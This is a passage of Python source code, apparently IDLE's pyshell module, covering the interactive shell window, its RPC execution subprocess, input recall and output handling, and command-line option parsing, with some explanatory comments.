if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
self.original_compiler_flags = self.compile.compiler.flags
_afterid = None
rpcclt = None
rpcsubproc = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
self.rpcsubproc = subprocess.Popen(self.subprocess_arglist)
def build_subprocess_arglist(self):
assert (self.port!=0), (
"Socket should have been assigned a port number.")
w = ['-W' + s for s in sys.warnoptions]
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'idlelib.pyshell':
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
return [sys.executable] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (HOST, self.port)
# GUI makes several attempts to acquire socket, listens for connection
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except OSError:
pass
else:
self.display_port_binding_error()
return None
# if PORT was 0, system will assign an 'ephemeral' port. Find it out:
self.port = self.rpcclt.listening_sock.getsockname()[1]
# if PORT was not 0, probably working with a remote execution server
if PORT != 0:
# To allow reconnection within the 2MSL wait (cf. Stevens TCP
# V1, 18.6), set SO_REUSEADDR. Note that this can be problematic
# on Windows since the implementation allows two active sockets on
# the same address!
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.rpcclt.register("console", self.tkconsole)
self.rpcclt.register("stdin", self.tkconsole.stdin)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path(with_cwd=True)
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self, with_cwd=False, filename=''):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
debugger_r.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.terminate_subprocess()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.transfer_path(with_cwd=with_cwd)
console.stop_readline()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
tag = 'RESTART: ' + (filename if filename else 'Shell')
halfbar = ((int(console.width) - len(tag) - 4) // 2) * '='
console.write("\n{0} {1} {0}".format(halfbar, tag))
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
if not filename:
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
debugger_r.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.compile.compiler.flags = self.original_compiler_flags
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
if self._afterid is not None:
self.tkconsole.text.after_cancel(self._afterid)
try:
self.rpcclt.listening_sock.close()
except AttributeError: # no socket
pass
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.terminate_subprocess()
self.tkconsole.executing = False
self.rpcclt = None
def terminate_subprocess(self):
"Make sure subprocess is terminated"
try:
self.rpcsubproc.kill()
except OSError:
# process already terminated
return
else:
try:
self.rpcsubproc.wait()
except OSError:
return
def transfer_path(self, with_cwd=False):
if with_cwd: # Issue 13506
path = [''] # include Current Working Directory
path.extend(sys.path)
else:
path = sys.path
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, OSError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print(repr(what), file=console)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "pyshell.ModifiedInterpreter: Subprocess ERROR:\n"
print(errmsg, what, file=sys.__stderr__)
print(errmsg, what, file=console)
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self._afterid = self.tkconsole.text.after(
self.tkconsole.pollinterval, self.poll_subprocess)
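# Responses arrive as (how, what) pairs: ("OK", 42) prints repr(42) to the
# console, ("OK", None) prints nothing, and ("ERROR", msg) is echoed to
# both sys.__stderr__ and the shell before execution is wound down.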
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
from idlelib import debugobj_r
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = debugobj_r.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.tree import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.CurrentTheme()
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
with tokenize.open(filename) as fp:
source = fp.read()
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
print('*** Error in script or command!\n'
'Traceback (most recent call last):',
file=self.tkconsole.stderr)
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
# at the moment, InteractiveInterpreter expects str
assert isinstance(source, str)
#if isinstance(source, str):
# from idlelib import iomenu
# try:
# source = source.encode(iomenu.encoding)
# except UnicodeError:
# self.tkconsole.resetoutput()
# self.write("Unsupported characters in input\n")
# return
try:
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
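# e.g. the first call stuffsource("x = 1\n") returns '<pyshell#0>' and sets
# linecache.cache['<pyshell#0>'] to (7, 0, ['x = 1', ''], '<pyshell#0>'),
# which is what lets tracebacks display shell input lines.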
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Override Interactive Interpreter method: Use Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
tkconsole = self.tkconsole
text = tkconsole.text
text.tag_remove("ERROR", "1.0", "end")
type, value, tb = sys.exc_info()
msg = getattr(value, 'msg', '') or value or "<no detail available>"
lineno = getattr(value, 'lineno', '') or 1
offset = getattr(value, 'offset', '') or 0
if offset == 0:
lineno += 1 #mark end of offending line
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
tkconsole.colorize_syntax_error(text, pos)
tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % msg)
tkconsole.showprompt()
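# Worked example of the position arithmetic above: lineno=2, offset=5
# yields pos == "iomark linestart + 1 lines + 4 chars", i.e. the offending
# column on the second line of the current input region.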
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in list(c.keys()):
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec(code, self.locals)
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec(code, self.locals)
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
parent=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print("IDLE internal error in runcode()",
file=self.tkconsole.stderr)
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print("KeyboardInterrupt", file=self.tkconsole.stderr)
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
return self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind to a TCP/IP port, which is necessary to "
"communicate with its Python execution server. This might be "
"because no networking is installed on this computer. "
"Run IDLE with the -n command line switch to start without a "
"subprocess and refer to Help/IDLE Help 'Running without a "
"subprocess' for further details.",
parent=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Startup Error",
"IDLE's subprocess didn't make connection. Either IDLE can't "
"start a subprocess or personal firewall software is blocking "
"the connection.",
parent=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
parent=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "Python " + python_version() + " Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Window"),
("help", "_Help"),
]
# New classes
from idlelib.history import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
OutputWindow.__init__(self, flist, None, None)
#
## self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.context_use_ps1 = True
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import iomenu
self.stdin = PseudoInputFile(self, "stdin", iomenu.encoding)
self.stdout = PseudoOutputFile(self, "stdout", iomenu.encoding)
self.stderr = PseudoOutputFile(self, "stderr", iomenu.encoding)
self.console = PseudoOutputFile(self, "console", iomenu.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self.stdin
try:
# page help() text to shell.
import pydoc # import must be done here to capture i/o rebinding.
# XXX KBK 27Dec07 use TextViewer someday, but must work w/o subproc
pydoc.pager = pydoc.plainpager
except:
sys.stderr = sys.__stderr__
raise
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
_stop_readline_flag = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
parent=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
debugger_r.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = debugger_r.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"Your program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
self.stop_readline()
self.canceled = True
self.closing = True
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "copyright", "credits" or "license()" for more information.'
def begin(self):
self.text.mark_set("iomark", "insert")
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = ("==== No Subprocess ====\n\n" +
"WARNING: Running IDLE without a Subprocess is deprecated\n" +
"and will be removed in a later version. See Help/IDLE Help\n" +
"for details.\n\n")
sys.displayhook = rpc.displayhook
self.write("Python %s on %s\n%s\n%s" %
(sys.version, sys.platform, self.COPYRIGHT, nosub))
self.text.focus_force()
self.showprompt()
import tkinter
tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def stop_readline(self):
if not self.reading: # no nested mainloop to exit.
return
self._stop_readline_flag = True
self.top.quit()
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
if self._stop_readline_flag:
self._stop_readline_flag = False
return ""
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
# (but only if it is before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
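# Example: recalling "    if x:\n        y()" at a bare prompt inserts
# "if x:" (the first line is stripped), then re-bases the continuation
# line's indent on the new prompt line, preserving the relative step.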
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
self.interp.runsource(line)
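# e.g. "print(1)  \n  " is submitted as "print(1)": trailing spaces/tabs
# and one final newline are stripped, which is what lets a second Return
# end and submit a multi-line statement.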
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
parent=self.text)
return
from idlelib.stackviewer import StackBrowser
StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
"Callback for Run/Restart Shell Cntl-F6"
self.interp.restart_subprocess(with_cwd=True)
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
def write(self, s, tags=()):
if isinstance(s, str) and len(s) and max(s) > '\uffff':
# Tk doesn't support outputting non-BMP characters
# Let's assume the printed string is not very long,
# find first non-BMP character and construct informative
# UnicodeEncodeError exception.
for start, char in enumerate(s):
if char > '\uffff':
break
raise UnicodeEncodeError("UCS-2", char, start, start+1,
'Non-BMP character not supported in Tk')
try:
self.text.mark_gravity("iomark", "right")
count = OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
raise ###pass # ### 11Aug07 KBK if we are expecting exceptions
# let's find out what they are and be specific.
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
return count
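# e.g. write('\U0001F600') raises UnicodeEncodeError('UCS-2', ..., 0, 1,
# 'Non-BMP character not supported in Tk') instead of handing a non-BMP
# code point to the Tk text widget.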
def rmenu_check_cut(self):
try:
if self.text.compare('sel.first', '<', 'iomark'):
return 'disabled'
except TclError: # no selection, so the index 'sel.first' doesn't exist
return 'disabled'
return super().rmenu_check_cut()
def rmenu_check_paste(self):
if self.text.compare('insert','<','iomark'):
return 'disabled'
return super().rmenu_check_paste()
def fix_x11_paste(root):
"Make paste replace selection on x11. See issue #5124."
if root._windowingsystem == 'x11':
for cls in 'Text', 'Entry', 'Spinbox':
root.bind_class(
cls,
'<<Paste>>',
'catch {%W delete sel.first sel.last}\n' +
root.bind_class(cls, '<<Paste>>'))
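# The prepended Tcl line deletes any active selection before the stock
# <<Paste>> script runs (catch swallows the error when no selection
# exists), so a paste replaces the selection on x11 as on other platforms.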
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (DEPRECATED,
see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print(sys.argv)" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print(sys.argv)" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
import getopt
from platform import system
from idlelib import testing # bool value
from idlelib import macosx
global flist, root, use_subprocess
capture_warnings(True)
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error as msg:
print("Error: %s\n%s" % (msg, usage_msg), file=sys.stderr)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
print(" Warning: running IDLE without a subprocess is deprecated.",
file=sys.stderr)
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print("No script file: ", script)
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if not dir in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if dir not in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not enable_edit
# Setup root. Don't break user code run in IDLE process.
# Don't change environment when testing.
if use_subprocess and not testing:
NoDefaultRoot()
root = Tk(className="Idle")
root.withdraw()
# set application icon
icondir = os.path.join(os.path.dirname(__file__), 'Icons')
if system() == 'Windows':
iconfile = os.path.join(icondir, 'idle.ico')
root.wm_iconbitmap(default=iconfile)
else:
ext = '.png' if TkVersion >= 8.6 else '.gif'
iconfiles = [os.path.join(icondir, 'idle_%d%s' % (size, ext))
for size in (16, 32, 48)]
icons = [PhotoImage(master=root, file=iconfile)
for iconfile in iconfiles]
root.wm_iconphoto(True, *icons)
# start editor and/or shell windows:
fixwordbreaks(root)
fix_x11_paste(root)
flist = PyShellFileList(root)
macosx.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args[:]:
if flist.open(filename) is None:
# filename is actually a directory; disregard it
args.remove(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosx.isAquaTk() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
else:
shell = flist.pyshell
# Handle remaining options. If any of these are set, enable_shell
# was set also, so shell must be true to reach here.
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
elif shell:
# If there is a shell window and no cmd or script in progress,
# check for problematic OS X Tk versions and print a warning
# message in the IDLE shell window; this is less intrusive
# than always opening a separate window.
tkversionwarning = macosx.tkVersionWarning(root)
if tkversionwarning:
shell.interp.runcommand("print('%s')" % tkversionwarning)
while flist.inversedict: # keep IDLE running while files are open.
root.mainloop()
root.destroy()
capture_warnings(False)
if __name__ == "__main__":
sys.modules['pyshell'] = sys.modules['__main__']
main()
capture_warnings(False) # Make sure turned off; see issue 18081
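# A hedged sketch of how the flags parsed above combine on the command line
# (assumed invocations; the exact entry point depends on the installation):
#
#   python -m idlelib -e foo.py        # open foo.py in an editor window
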